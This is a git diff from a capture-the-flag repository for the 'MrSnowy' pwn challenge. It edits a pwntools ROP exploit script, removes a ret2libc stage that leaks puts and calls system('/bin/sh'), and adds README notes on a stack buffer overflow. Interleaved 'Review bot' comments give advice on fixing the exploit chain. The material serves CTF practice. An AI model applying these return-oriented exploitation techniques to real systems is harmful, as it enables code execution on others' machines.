diff --git a/pwn/mrsnowy/.gdb_history b/pwn/mrsnowy/.gdb_history
new file mode 100644
index 0000000..fd4eab9
--- /dev/null
+++ b/pwn/mrsnowy/.gdb_history
@@ -0,0 +1,3 @@
+stack
+r
+quit
diff --git a/pwn/mrsnowy/kabuttmache.py b/pwn/mrsnowy/kabuttmache.py
index 72ef5fa..c54bbcc 100755
--- a/pwn/mrsnowy/kabuttmache.py
+++ b/pwn/mrsnowy/kabuttmache.py
@@ -17,7 +17,7 @@ def do_read():
 
 rop = ROP(elf)
 rop.call(elf.symbols['puts'], [elf.got['puts']])
-rop.call(elf.symbols['investigate'])
+rop.call(elf.symbols['deactivate_camera'])
 
 # assemble payload
 payload = [
@@ -32,28 +32,5 @@ do_read()
 
 # send payload
 p.sendline(b''.join(payload))
 
-puts = u64(p.recvuntil(b'\n').rstrip().ljust(8, b'\x00'))
-log.info(f'puts found at {hex(puts)}')
-# Note:
-# libc database search for puts address: 0x6d31333b315b1b20
-# -> libc6_2.19-18+deb8u10_i386
-# -> https://libc.blukat.me/d/libc6_2.19-18+deb8u10_i386.so
-
-libc = ELF("libc6_2.19-18+deb8u10_i386.so")
-libc.address = puts - libc.symbols["puts"]
-log.info(f'libc base address determined {hex(libc.address)}')
-
-rop = ROP(libc)
-rop.call('puts', [ next(libc.search(b'/bin/sh\x00')) ])
-rop.call('system', [ next(libc.search(b'/bin/sh\x00')) ])
-rop.call('exit')
-
-# assemble payload
-payload = [
-    b'\xAA'*offset,
-    rop.chain()
-]
-
-p.sendline(b''.join(payload))
 p.interactive()
diff --git a/pwn/mrsnowy/mr_snowy b/pwn/mrsnowy/mr_snowy
index e57bee2..c5f91ca 100755
Binary files a/pwn/mrsnowy/mr_snowy and b/pwn/mrsnowy/mr_snowy differ
diff --git a/pwn/mrsnowy/Pipfile b/pwn/mrsnowy/mrsnowy.bak/Pipfile
similarity index 100%
rename from pwn/mrsnowy/Pipfile
rename to pwn/mrsnowy/mrsnowy.bak/Pipfile
diff --git a/pwn/mrsnowy/Pipfile.lock b/pwn/mrsnowy/mrsnowy.bak/Pipfile.lock
similarity index 100%
rename from pwn/mrsnowy/Pipfile.lock
rename to pwn/mrsnowy/mrsnowy.bak/Pipfile.lock
diff --git a/pwn/mrsnowy/mrsnowy.bak/README.md b/pwn/mrsnowy/mrsnowy.bak/README.md
new file mode 100644
index 0000000..ae9c3d2
--- /dev/null
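Review bot: `rop.call(elf.symbols['deactivate_camera'])` returns straight into the target with no stack-alignment gadget in front of it; on x86_64 a function that goes on to call `system()` or `printf()` can fault on a `movaps` when rsp is not 16-byte aligned at the call, so if the chain dies inside deactivate_camera the first thing to try is `rop.raw(rop.find_gadget(['ret'])[0])` immediately before this line. Since the same commit swaps out the `mr_snowy` binary, `elf.symbols['deactivate_camera']` will raise a bare `KeyError` at chain-build time if the new build is stripped or names the function differently; an `assert 'deactivate_camera' in elf.symbols, 'target symbol missing from binary'` ahead of the `ROP(elf)` construction gives a clearer failure. The `payload = [` list that closes this hunk continues outside it.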
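Review bot: With the `puts = u64(p.recvuntil(...))` consumer gone, the `puts(elf.got['puts'])` call that the chain still builds earlier in this file executes anyway and writes a raw libc pointer into the output right before `p.interactive()`, but nothing reads or uses it any more. Either drop that `rop.call` so the chain is just the return into `deactivate_camera`, or keep a receive that consumes and logs it, e.g. `leak = p.recvline(); log.info('puts@libc leak: %s', leak.hex())`, so the binary bytes do not get mixed into the interactive session. The `do_read()` call in the hunk header and the definition of `do_read` sit outside this hunk.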
+++ b/pwn/mrsnowy/mrsnowy.bak/README.md
@@ -0,0 +1,63 @@
+# MrSnowy
+
+There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
+But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
+Something must be wrong with him.
+
+## Flag
+
+Not pwned
+
+## Progress so far
+
+![vulnerable function](images/investigate.png)
+
+- The `read()` reads 0x108 bytes of input from stdin
+  - The buffer is uninitialized
+  - The functioncall sits at `*investigate+67`
+- The Stackframe of the function only has a size of 0x40 bytes
+- `checksec --file=mrsnowy` reports NX being enabled
+  - So no shellcode will be placable unless there is executable space
+  - This hints to ROP Chaining
+
+
+![dissasembly of investigate function](images/investigate_disass.png)
+
+- The binary should be patched to get rid of the timetaking animation
+  - Just `nop` the banner() function call using radare2
+- Overwriting the returnpointer of `investigate()` using pwntools:
+
+```python
+context(arch='x86_64', os='linux')
+context.terminal = ['/usr/bin/alacritty', '-e']
+e = ELF("mr_snowy")
+p = process(e.path)
+
+# read banner and stuff until input is requested
+def do_read():
+    while True:
+        ll = p.read()
+        print(ll)
+        if b'>' in ll:
+            break
+
+# if not patched wait for the animation and send 1
+do_read()
+p.sendline('1')
+do_read()
+
+# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
+p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
+
+# start the python debugger to get a coredump which is loadable by gdb
+ipdb.set_trace()
+```
+
+- Trying to find ROP Gadgets using pwntools
+
+```python
+e = ELF("mr_snowy")
+rop = ROP(elf)
+rop.rbx
+rop.gadgets
+```
diff --git a/pwn/mrsnowy/core b/pwn/mrsnowy/mrsnowy.bak/core
similarity index 100%
rename from pwn/mrsnowy/core
rename to pwn/mrsnowy/mrsnowy.bak/core
diff --git a/pwn/mrsnowy/mrsnowy.bak/mr_snowy b/pwn/mrsnowy/mrsnowy.bak/mr_snowy
new file mode 100755
index 0000000..e57bee2
Binary files /dev/null and b/pwn/mrsnowy/mrsnowy.bak/mr_snowy differ
diff --git a/pwn/mrsnowy/pwn.py b/pwn/mrsnowy/mrsnowy.bak/pwn.py
similarity index 100%
rename from pwn/mrsnowy/pwn.py
rename to pwn/mrsnowy/mrsnowy.bak/pwn.py
diff --git a/pwn/mrsnowy/target b/pwn/mrsnowy/mrsnowy.bak/target
similarity index 100%
rename from pwn/mrsnowy/target
rename to pwn/mrsnowy/mrsnowy.bak/target